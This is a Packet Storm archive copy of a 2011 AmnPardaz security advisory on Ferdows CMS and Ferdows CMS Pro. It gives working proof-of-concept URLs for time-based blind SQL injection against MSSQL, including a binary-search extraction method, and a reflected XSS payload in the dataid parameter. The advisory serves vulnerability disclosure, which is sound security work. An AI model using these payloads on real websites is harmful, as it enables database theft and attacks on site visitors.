what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Ferdows CMS 9.0.5 / Ferdows CMS Pro 1.1.0 SQL Injection / XSS

Ferdows CMS 9.0.5 / Ferdows CMS Pro 1.1.0 SQL Injection / XSS
Posted Jul 12, 2011
Authored by AmnPardaz Security Research Team | Site bugreport.ir

Ferdows CMS Pro versions 1.1.0 and below and Ferdows CMS versions 9.0.5 and below suffer from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | 3559b41dd26cb3dc3a35867ec55cf53e9055a014b63f1abcf5469010128be08f

Ferdows CMS 9.0.5 / Ferdows CMS Pro 1.1.0 SQL Injection / XSS

Change Mirror Download
########################## www.BugReport.ir  
#######################################
#
# AmnPardaz Security Research Team
#
# Title: Ferdows CMS Pro <=1.1.0 and Ferdows CMS <=9.0.5 Multiple
Vulnerabilities
# Vendor: www.fcms.ir
# Exploit: Available
# Vulnerable Version: 1.1.0 (Pro) & 9.0.5 (CMS)
# Impact: Medium
# Original Advisory: http://www.bugreport.ir/index_77.htm
# Fix: N/A
###################################################################################

####################
1. Description:
####################

Ferdows CMS is a complete, fully featured CMS in ASP.NET language and
using AJAX technology with MSSQL and became a powerful CMS having
plenty of strong modules.
This CMS is not open-source and is accessible for private use by the
author company for designing their customer's websites.

####################
2. Vulnerabilities:
####################

2.1. Injection Flaws. Blind SQL Injection in "/about.aspx" and
"/archive.aspx" and "/default1.aspx" in "siteid" parameter.
2.1.1. Exploit:
Check the exploit/POC section.

2.2. Injection Flaws. Blind SQL Injection in "/archive.aspx" in "sid"
parameter.
2.2.1. Exploit:
Check the exploit/POC section.

2.3. Cross Site Scripting (XSS). Reflected XSS attack in
"/showdata.aspx" in "dataid" parameter. (Post Method)
2.3.1. Exploit:
Check the exploit/POC section.

####################
3. Exploits/PoCs:
####################

Original Exploit URL: http://www.bugreport.ir/77/exploit.htm

3.1. Injection Flaws. Blind SQL Injection in "/about.aspx" and
"/archive.aspx" and "/default1.aspx" in "siteid" parameter.
3.2. Injection Flaws. Blind SQL Injection in "/archive.aspx" in "sid"
parameter.
-------------
Check database username:
http://[URL]/default1.aspx?siteid=1'; IF SYSTEM_USER='sa' waitfor
delay '00:00:10'--
http://[URL]/archive.aspx?sid=19&siteid=1'; IF SYSTEM_USER='sa'
waitfor delay '00:00:10'--
http://[URL]/archive.aspx?sid=19'; IF SYSTEM_USER='sa' waitfor delay
'00:00:10'--&siteid=1

Binary Search Exploits:
http://[URL]/about.aspx?siteid=1'; IF ASCII(SUBSTRING((…),i,1)) > k
waitfor delay '00:00:10'--

Note: In last POC, i is the i-th byte returned by the one-row
subquery (…) and k is the current middle value of the binary search.

-------------
3.3. Cross Site Scripting (XSS). Reflected XSS attack in
"/showdata.aspx" in "dataid" parameter. (POST METHOD)
-------------
http://[URL]/showdata.aspx?dataid=%22%20onmouseover%3Dprompt%28%27XSS-from-BugReport%27%29%20continue%3D%22&siteid=1

__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=%2fwEWBQKh%2f8jADgKprNPRAQKe%2b%2bCDCwKY38eYCQLRmu35DOB6MkYbirW%2fduDB97KKNKznAXjO&__VIEWSTATE=%2fwEPDwUKMTc1Nzk5Nzk1MGQYAgU0Y3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRWaWV3cG9pbnQxJENhcHRjaGFDb250cm9sMQ8FJDc4OTg0YzkzLThiOWQtNDczZi04OTExLWYwZjcxODRiODFiOWQFMWN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkVmlld3BvaW50MSRHVl9WaWV3UG9pbnQPPCsACgEIZmTsHHUhMC543Vq3m%2fWANPP5J1edvw%3d%3d&ctl00%24ContentPlaceHolder1%24Viewpoint1%24CaptchaControl1=&ctl00%24ContentPlaceHolder1%24Viewpoint1%24sendvp=%d8%a7%d8%b1%d8%b3%d8%a7%d9%84&ctl00%24ContentPlaceHolder1%24Viewpoint1%24tx_body=&ctl00%24ContentPlaceHolder1%24Viewpoint1%24tx_email=sample@email.tst&ctl00%24ContentPlaceHolder1%24Viewpoint1%24tx_name=testt
-------------




####################
4. Solution:
####################

Edit the source code to ensure that inputs are properly sanitized.

####################
5. Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close